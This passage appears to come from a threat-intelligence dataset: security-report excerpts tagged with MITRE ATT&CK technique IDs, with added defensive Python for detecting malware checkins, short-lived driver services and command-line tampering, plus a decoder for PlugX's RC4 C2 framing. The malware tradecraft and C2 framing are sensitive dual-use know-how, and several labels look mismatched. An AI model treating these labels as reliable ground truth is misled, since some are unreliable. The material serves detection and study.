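    std = padded.translate(str.maketrans("-_", "+/"))  # URL-safe -> standard
    try:
        return base64.b64decode(std, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_checkins(urls):
    """Return (url, blob, decoded_or_None, entropy) for each URL whose path
    matches the checkin shape. The shape match is the indicator; the decode
    result and entropy are there to help triage."""
    hits = []
    for url in urls:
        m = CHECKIN_RE.match(urlsplit(url).path)
        if not m:
            continue
        blob = m.group("blob")
        hits.append((url, blob, try_base64(blob), round(shannon_entropy(blob), 2)))
    return hits


if __name__ == "__main__":
    for url, blob, decoded, ent in find_checkins(SAMPLE_URLS):
        print(f"{url}\n  entropy={ent} decoded={decoded!r}")
```

Matching the path shape is the indicator; legitimate CDNs also serve long hashed image names, so baseline the host and the blob length and entropy against normal traffic before alerting on it.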
|
|
{"text1":"Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist","labels":"['T1567.002']"}
|
|
{"text1":"They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies","labels":"['T1490']"}
|
|
{"text1":"Emotet artifacts are typically found in arbitrary paths located off of the AppData\\Local and AppData\\Roaming directories. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services","labels":"['T1053.005']"}
|
|
{"text1":"The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome","labels":"['T1056.001']"}
|
|
{"text1":"Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for","labels":"['T1567.002']"}
|
|
{"text1":"The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an \u2018incorrect\u2019 directory \u2013 such as a potential automated sandbox \u2013 it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process","labels":"['T1083', 'T1497.001']"}
|
|
{"text1":"Before being sent to the server, the data structure has to pass through shaping as shown in Fig","labels":"['T1560']"}
|
|
{"text1":"When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode","labels":"['T1071.001']"}
|
|
{"text1":"For persistence and remote control, the script downloads another base64-encoded Python script from hxxps:\/\/ptpb[.]pw\/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control","labels":"['T1027']"}
|
|
{"text1":"The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment \u201cone line shellcode injection with native x86 shellcode","labels":"['T1105']"}
|
|
{"text1":"Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A","labels":"['T1583.001']"}
|
|
{"text1":"For example, here is a folder and a list of files created by picking the C:\\Windows\\system32\\TCPSVCS.exe executable as a source of data","labels":"['T1543.003']"}
|
|
{"text1":"The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named \u201cReaver\u201d. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown","labels":"['T1071.001', 'T1095']"}
|
|
{"text1":"Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value","labels":"['T1105', 'T1573.002']"}
|
|
{"text1":"When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution","labels":"['T1218.010']"}
|
|
{"text1":"The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning","labels":"['T1059.005']"}
|
|
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1016', 'T1119', 'T1587.001', 'T1078']"}
|
|
{"text1":"To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key","labels":"['T1106', 'T1543.003']"}
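The short-lived service described here (created, started in a loop, and removed by deleting its registry key as soon as the driver is loaded) is a distinctive sequence in host telemetry. The following is an added example, not code from the report: Python that correlates constructed service-install, service-start and registry-key-delete events by service name and flags kernel-driver services whose Services key disappears within a window of installation, reporting the number of start attempts and whether the name follows the 4-character pattern. Event names, timestamps and service names are invented; map them to your own EDR or Sysmon schema.

```python
from collections import defaultdict

# Constructed host telemetry, not real events: timestamps in milliseconds,
# event names loosely modelled on the service-install, service-start and
# registry events an EDR records. Service names and paths are invented.
SAMPLE_EVENTS = [
    {"ts": 50_000, "event": "ServiceInstall", "name": "WdNisDrv",
     "display": "Microsoft Defender Network Inspection Driver", "type": "kernel"},
    {"ts": 50_020, "event": "ServiceStart", "name": "WdNisDrv"},
    {"ts": 100_000, "event": "ServiceInstall", "name": "zkdp",
     "display": "zkdp", "type": "kernel"},
    {"ts": 100_050, "event": "ServiceStart", "name": "zkdp"},
    {"ts": 100_060, "event": "ServiceStart", "name": "zkdp"},
    {"ts": 100_070, "event": "ServiceStart", "name": "zkdp"},
    {"ts": 100_080, "event": "ServiceStart", "name": "zkdp"},
    {"ts": 100_090, "event": "ServiceStart", "name": "zkdp"},
    {"ts": 100_400, "event": "RegistryKeyDelete",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\zkdp"},
    {"ts": 200_000, "event": "ServiceInstall", "name": "OldAgent",
     "display": "Old Agent", "type": "win32"},
    {"ts": 500_000, "event": "RegistryKeyDelete",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\OldAgent"},
]

SERVICES_KEY_PREFIX = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"


def find_ephemeral_driver_services(events, window_ms=60_000):
    """Flag kernel-driver services whose Services\\<name> key is deleted
    within window_ms of installation. Each finding carries the service
    lifetime, how many times it was started, and whether the name is a
    4-character string that also serves as the display name."""
    by_name = defaultdict(lambda: {"install": None, "starts": [], "delete": None})
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event"] == "ServiceInstall":
            by_name[ev["name"].lower()]["install"] = ev
        elif ev["event"] == "ServiceStart":
            by_name[ev["name"].lower()]["starts"].append(ev["ts"])
        elif ev["event"] == "RegistryKeyDelete":
            key = ev["key"]
            if key.lower().startswith(SERVICES_KEY_PREFIX.lower()):
                by_name[key[len(SERVICES_KEY_PREFIX):].lower()]["delete"] = ev["ts"]

    findings = []
    for rec in by_name.values():
        inst = rec["install"]
        if inst is None or rec["delete"] is None or inst.get("type") != "kernel":
            continue
        lifetime = rec["delete"] - inst["ts"]
        if lifetime > window_ms:
            continue
        name = inst["name"]
        findings.append({
            "name": name,
            "lifetime_ms": lifetime,
            "start_attempts": len(rec["starts"]),
            "four_char_name": len(name) == 4 and inst.get("display") == name,
        })
    return findings


if __name__ == "__main__":
    for f in find_ephemeral_driver_services(SAMPLE_EVENTS):
        print(f)
```

A driver that is installed, started repeatedly and unregistered within a second has no legitimate reason to exist; the 4-character name and identical display name are a weaker, corroborating signal.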
|
|
{"text1":"Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files. The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format: http:\/\/<attacker_controlled_domain>\/report.php","labels":"['T1071.001']"}
|
|
{"text1":"Between 2016 and 2020, we have seen ScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. [7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movement and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. [6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. [7] In 2020, ScreenConnect\/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware","labels":"['T1059.001']"}
|
|
{"text1":"Stage 1: A Master Boot Record\u00a0(MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine","labels":"['T1561.002']"}
|
|
{"text1":"The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques","labels":"['T1105']"}
|
|
{"text1":"BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware","labels":"['T1113']"}
|
|
{"text1":"As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so","labels":"['T1105', 'T1071.001']"}
|
|
{"text1":"Many fields of the installer are forged to imitate the Acrobat Reader installer, and the interface shown when it runs is likewise styled after Acrobat Reader","labels":"['T1036.005']"}
|
|
{"text1":"The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C","labels":"['T1059.003', 'T1218.010', 'T1059.001', 'T1140', 'T1547.009']"}
|
|
{"text1":"Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and use full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as \u201c.dat\u201d files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information","labels":"['T1105']"}
|
|
{"text1":"Execution through API (a batch file, for example). - Process discovery, matching running processes both by hashes of their names and by the names directly. File and directory discovery: to search for files to encrypt. Encrypt files. Create files","labels":"['T1486']"}
|
|
{"text1":"The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them","labels":"['T1132.001', 'T1573.001']"}
|
|
{"text1":"1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign","labels":"['T1027']"}
|
|
{"text1":"Implant Type \u2013 WaterBear is a stage-2 implant with many capabilities; BendyBear is a stage-0 downloader","labels":"['T1105']"}
|
|
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors","labels":"['T1021.002']"}
|
|
{"text1":"SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c","labels":"['T1057', 'T1564.010']"}
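The evasion in this record defeats any analysis that trusts the PEB alone, so the check a practitioner wants is a cross-reference between the command line the process now reports and the one recorded when it was created. As an added example that is not part of the original report, the Python below tokenises both command lines with Windows-style quote handling, ignores cosmetic differences in quoting and case, and reports processes whose in-memory command line has been reduced to the bare program name or rewritten altogether. The process records are constructed sample data; paths, PIDs and arguments are invented.

```python
import re

# Constructed process records, not a real memory image: for each PID, the
# command line captured at creation (process-creation event) and the one
# read back from the live process's PEB (RTL_USER_PROCESS_PARAMETERS
# .CommandLine). Paths, PIDs and arguments are invented.
SAMPLE_PROCESSES = [
    {"pid": 1040, "image": r"C:\Windows\explorer.exe",
     "creation_cmdline": r'"C:\Windows\explorer.exe"',
     "peb_cmdline": r"C:\Windows\explorer.exe"},            # quoting only
    {"pid": 2216, "image": r"C:\Windows\System32\svchost.exe",
     "creation_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "peb_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "creation_cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -f C:\ProgramData\loader.txt',
     "peb_cmdline": "powershell.exe"},                        # arguments gone
    {"pid": 5308, "image": r"C:\Windows\System32\cmd.exe",
     "creation_cmdline": r"cmd.exe /c whoami",
     "peb_cmdline": r"cmd.exe /c hostname"},                  # rewritten
]

# A token is either a double-quoted run or a run of non-whitespace.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes,
    and normalise case and quoting so cosmetic differences do not alarm."""
    return [t.strip('"').lower() for t in TOKEN_RE.findall(cmdline)]


def compare_command_lines(processes):
    """Return one finding per process whose PEB command line disagrees with
    the command line recorded at creation."""
    findings = []
    for p in processes:
        seen = tokenize(p["creation_cmdline"])
        peb = tokenize(p["peb_cmdline"])
        if seen == peb:
            continue
        if len(peb) == 1 and len(seen) > 1 and seen[0].endswith(peb[0]):
            reason = "arguments stripped"   # only the program name survives
        else:
            reason = "command line rewritten"
        findings.append({
            "pid": p["pid"], "image": p["image"], "reason": reason,
            "creation_cmdline": p["creation_cmdline"],
            "peb_cmdline": p["peb_cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in compare_command_lines(SAMPLE_PROCESSES):
        print(f"pid {f['pid']}: {f['reason']}\n  seen: {f['creation_cmdline']}\n  peb:  {f['peb_cmdline']}")
```

Process-creation events (Sysmon Event ID 1, or Windows Security 4688 with command-line auditing enabled) or a kernel-level EDR supply the creation-time side; the PEB side comes from the live process or from the memory image under analysis.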
|
|
{"text1":"POWRUNER may also receive batch commands from the C2 server to collect host information from the system","labels":"['T1083', 'T1057', 'T1047', 'T1049', 'T1016', 'T1082', 'T1033']"}
|
|
{"text1":"The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS","labels":"['T1071.001']"}
|
|
{"text1":"TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004)","labels":"['T1204.003']"}
|
|
{"text1":"Crutch is able to bypass some security layers by abusing legitimate infrastructure \u2013 here Dropbox \u2013 in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators","labels":"['T1102.002']"}
|
|
{"text1":"Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly","labels":"['T1074.001', 'T1560']"}
|
|
{"text1":"Woburn, MA \u2013 May 7, 2018 \u2013 Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelg\u00e4nging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox","labels":"['T1027']"}
|
|
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK newspaper, reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony","labels":"['T1070.001']"}
{"text1":"The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module","labels":"['T1078.002']"}
{"text1":"We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active","labels":"['T1568']"}
{"text1":"Regarding downloading and executing a tool, Flagpro stores the downloaded file in file path \u201c%Temp%\\~MY[0-9A-F].tmp\u201d first. Then, Flagpro adds extension \u201c.exe\u201d to the name of stored file and executes the file","labels":"['T1036']"}
{"text1":"Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use of malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns","labels":"['T1486']"}
{"text1":"In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response","labels":"['T1132.001']"}
{"text1":"Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts","labels":"['T1021.005', 'T1021.001', 'T1021.004']"}
{"text1":"The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server","labels":"['T1090.002']"}
{"text1":"This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script","labels":"['T1059.001']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated","labels":"['T1105']"}
{"text1":"The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid","labels":"['T1484.001', 'T1078.002']"}
{"text1":"AT&T Alien Labs\u2122 has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell\/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more","labels":"['T1547.001', 'T1059.003']"}
{"text1":"To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware","labels":"['T1588.002']"}
{"text1":"It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel\u00a0rootkit","labels":"['T1014']"}
{"text1":"Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script\u2019s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used","labels":"['T1057']"}
{"text1":"If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components","labels":"['T1569.002']"}
{"text1":"Network Reconnaissance \u2013 gathering information from machines on the network. Credential Theft \u2013 stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving \u2013 files are transferred to staging servers before exfiltration. Csvde \u2013 can be used to extract Active Directory files and data. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system","labels":"['T1074.002']"}
{"text1":"On balance,\u00a0the fall campaigns diverged from\u00a0Bulgarian themed\u00a0NetWire\u00a0campaigns in the\u00a0early\u00a0summer in\u00a0scope\u00a0and scale. These campaigns distributed\u00a0NetWire\u00a0variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through\u00a0certutils. The\u00a0NetWire\u00a0malware has been around since at least 2002 and has been consistently\u00a0in use by various actors across\u00a0the threat\u00a0landscape. This\u00a0analysis shows groupings of similar\u00a0campaigns distributing\u00a0NetWire\u00a0based on message attributes, email lures\u00a0and\u00a0language, Office document metadata, VBA Macro code, and malware configuration","labels":"['T1566.001', 'T1059.005']"}
{"text1":"This thread searches for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds","labels":"['T1005', 'T1083', 'T1074.001', 'T1119', 'T1025']"}
{"text1":"Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection. We observed the use of two signers during our research, as shown below in Figure 1","labels":"['T1553.002']"}
{"text1":"The FTP account information used in the malware can expose the C&C server to attacks. The string \u2018victory\u2019 used in the password has also been found in the b374k webshell used by the Kimsuky group","labels":"['T1598.003', 'T1059.005', 'T1027']"}
{"text1":"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server","labels":"['T1071.001']"}
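Added illustration of the compress-then-RC4 C2 framing the PlugX record above describes. This is example code written for this page, not PlugX code: the compressor (zlib) is an assumption because the record does not name one, the session key is made up, and the "whole first-response body is the key" rule used for the February 2022 variant is a placeholder for whatever parser a real sample needs. The point is the ordering: compress then encrypt on the way out, decrypt then decompress on the way in, which is also the order an analyst follows when decoding a capture once the key is known.

```python
"""Compress-then-RC4 C2 framing (added example, not PlugX code).

Assumptions not stated on the page: zlib as the compressor, a made-up
session key, and "stripped first-response body == key" for key delivery.
"""
import zlib


def rc4_keystream(key: bytes):
    """Standard RC4: key-scheduling (KSA), then the PRGA yielded byte by byte."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def wrap_outbound(key: bytes, plaintext: bytes) -> bytes:
    """Bot -> C2 direction: compress first, then encrypt the compressed bytes."""
    return rc4(key, zlib.compress(plaintext))


def unwrap_inbound(key: bytes, blob: bytes) -> bytes:
    """Reverse order for C2 -> bot data, and for an analyst decoding a capture."""
    return zlib.decompress(rc4(key, blob))


def key_from_first_response(body: bytes) -> bytes:
    """Key delivered in the first HTTP response (Feb-2022-style variant).
    ASSUMPTION: the stripped body is the key; a real sample needs the
    offset/format taken from its own configuration parser."""
    key = body.strip()
    if not key:
        raise ValueError("empty key in first response")
    return key


def decode_capture(first_response: bytes, frames: list) -> list:
    """Decode every later frame of a session with the key from the first response."""
    key = key_from_first_response(first_response)
    return [unwrap_inbound(key, f) for f in frames]


if __name__ == "__main__":
    # Constructed session: first response carries the (made-up) key, later
    # frames carry compressed+encrypted data in either direction.
    first = b"s3ss10n-k3y\r\n"
    key = key_from_first_response(first)
    frames = [wrap_outbound(key, b"hostname=WS01;user=alice"),
              wrap_outbound(key, b"cmd=whoami")]
    for pt in decode_capture(first, frames):
        print(pt)
```

The RC4 routine is plain textbook RC4; if a sample really uses a modified variant (as the GUP record further down says of its own tool), the KSA or PRGA would need to be adjusted from the disassembly before any capture decodes.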
{"text1":"Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it","labels":"['T1053.005']"}
{"text1":"The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process","labels":"['T1055', 'T1055.002']"}
{"text1":"This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I\u2019m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I\u2019m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon\u2019s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows","labels":"['T1078.003']"}
